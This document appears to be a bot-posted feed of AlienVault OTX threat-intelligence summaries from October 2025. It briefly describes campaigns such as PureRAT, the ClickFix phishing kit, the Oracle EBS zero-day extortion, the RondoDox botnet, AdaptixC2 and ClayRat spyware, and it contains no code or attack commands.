From infostealer to full RAT: dissecting the PureRAT attack chain

An investigation into what appeared at first glance to be a “standard” Python-based infostealer campaign took an interesting turn when it was discovered to culminate in the deployment of a full-featured, commercially available remote access trojan (RAT) known as PureRAT.

Pulse ID: 68e96e29b73e5334019b8810
Pulse Link: https://otx.alienvault.com/pulse/68e96e29b73e5334019b8810
Pulse Author: AlienVault
Created: 2025-10-10 20:35:52

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#CyberSecurity #InfoSec #InfoStealer #OTX #OpenThreatExchange #Python #RAT #RemoteAccessTrojan #Trojan #bot #AlienVault

The ClickFix Factory: First Exposure of IUAM ClickFix Generator

We have uncovered a phishing kit named the IUAM ClickFix Generator that automates the creation of these attacks. The kit is designed to generate highly customizable phishing pages that lure victims by mimicking browser verification challenges often used to block automated traffic. It includes advanced features such as operating system detection and clipboard injection, enabling low-effort, cross-platform malware deployment.

Pulse ID: 68e94967bcab143b278f0611
Pulse Link: https://otx.alienvault.com/pulse/68e94967bcab143b278f0611
Pulse Author: AlienVault
Created: 2025-10-10 17:59:02

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#Browser #Clipboard #CyberSecurity #InfoSec #Malware #Mimic #OTX #OpenThreatExchange #Phishing #RAT #bot #AlienVault

Crimson Collective: A New Threat Group Observed Operating in the Cloud

Over the past few weeks, Rapid7 has observed increased activity of a new threat group attacking AWS cloud environments with the goal of data exfiltration and subsequent extortion of the victim. This threat group refers to itself as ‘Crimson Collective’ and has recently announced that it is behind an attack on Red Hat, wherein it claims to have stolen private repositories from Red Hat’s GitLab.

Pulse ID: 68e93e6f7b450153bae6599b
Pulse Link: https://otx.alienvault.com/pulse/68e93e6f7b450153bae6599b
Pulse Author: AlienVault
Created: 2025-10-10 17:12:14

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#AWS #Cloud #CyberSecurity #ELF #Extortion #InfoSec #OTX #OpenThreatExchange #RAT #Rapid7 #bot #AlienVault

Oracle E-Business Suite Zero-Day Exploited in Widespread Extortion Campaign

A large-scale extortion campaign targeting Oracle E-Business Suite (EBS) customers began on September 29, 2025. The threat actor, claiming affiliation with the CL0P extortion brand, exploited a zero-day vulnerability (CVE-2025-61882) in EBS as early as August 9, 2025. The campaign involved sending emails to executives, alleging data theft from EBS environments. The attackers used a multi-stage Java implant framework to compromise Oracle EBS, exploiting vulnerabilities in the UiServlet and SyncServlet components. The attack chain included GOLDVEIN.JAVA downloader and SAGE* infection chain. While not formally attributed, the activity shows overlaps with confirmed and suspected FIN11 operations. The campaign highlights the ongoing trend of exploiting zero-day vulnerabilities in enterprise applications for data theft and extortion.

Pulse ID: 68e826492c3a91b3abe8c6b9
Pulse Link: https://otx.alienvault.com/pulse/68e826492c3a91b3abe8c6b9
Pulse Author: AlienVault
Created: 2025-10-09 21:16:57

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#Cl0p #CyberSecurity #DataTheft #Email #Extortion #InfoSec #Java #OTX #OpenThreatExchange #RAT #Vulnerability #ZeroDay #bot #AlienVault

From Targeting Pwn2Own Vulnerabilities to Shotgunning Exploits

A large-scale RondoDox botnet campaign has been identified, exploiting over 50 vulnerabilities across more than 30 vendors. The campaign targets internet-exposed infrastructure, including routers, DVRs, NVRs, CCTV systems, and web servers. It began with exploiting a vulnerability from Pwn2Own Toronto 2022 and has since expanded its arsenal. The campaign uses an 'exploit shotgun' approach, attempting multiple exploits simultaneously. Organizations are at risk of data exfiltration, persistent network compromise, and operational disruption. Prioritizing patching, conducting regular vulnerability assessments, segmenting networks, and continuous monitoring are recommended as proactive security measures.

Pulse ID: 68e86b551440846b11a598a1
Pulse Link: https://otx.alienvault.com/pulse/68e86b551440846b11a598a1
Pulse Author: AlienVault
Created: 2025-10-10 02:11:33

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#CyberSecurity #InfoSec #OTX #OpenThreatExchange #RAT #Vulnerability #bot #botnet #AlienVault

AdaptixC2 Uncovered: Capabilities, Tactics & Hunting Strategies

AdaptixC2 is a lightweight, modular command-and-control framework designed for flexibility and customization. The analysis reveals its sophisticated capabilities, including multi-protocol communication, advanced evasion techniques, and a BOF execution system for extensibility. The discovery of 102 active servers across multiple countries indicates widespread operational use, with attackers leveraging legitimate cloud infrastructure. The framework's support for HTTP, SMB, and TCP protocols creates diverse attack vectors, while its dynamic API resolution and encryption techniques challenge traditional detection methods. Built-in operational security features and lateral movement capabilities demonstrate its effectiveness for long-term persistence and network penetration. The exposed infrastructure and configuration patterns provide valuable intelligence for proactive defense and threat hunting activities.

Pulse ID: 68e82645eb2f88f5e620c2ae
Pulse Link: https://otx.alienvault.com/pulse/68e82645eb2f88f5e620c2ae
Pulse Author: AlienVault
Created: 2025-10-09 21:16:53

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#Cloud #CyberSecurity #Encryption #HTTP #ICS #InfoSec #LUA #OTX #OpenThreatExchange #RAT #SMB #TCP #bot #AlienVault

ClayRat: A New Android Spyware Targeting Russia

ClayRat is a rapidly evolving Android spyware campaign primarily targeting Russian users. Distributed through Telegram channels and phishing sites, it masquerades as popular apps to lure victims. The spyware can exfiltrate SMS messages, call logs, notifications, and device information, as well as take photos and send SMS messages. It spreads aggressively by sending malicious links to the victim's contacts. Over 600 samples and 50 droppers have been observed in three months, with each iteration adding new obfuscation techniques. ClayRat abuses Android's default SMS handler role to bypass permission prompts and gain access to sensitive data. The campaign combines impersonation of trusted services, community distribution via Telegram, UX-level deception, and self-propagation through mass SMS forwarding.

Pulse ID: 68e8c12eb7ebbc52304b33bc
Pulse Link: https://otx.alienvault.com/pulse/68e8c12eb7ebbc52304b33bc
Pulse Author: AlienVault
Created: 2025-10-10 08:17:49

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#Android #CyberSecurity #ELF #InfoSec #OTX #OpenThreatExchange #Phishing #RAT #Russia #Rust #SMS #SpyWare #Telegram #bot #AlienVault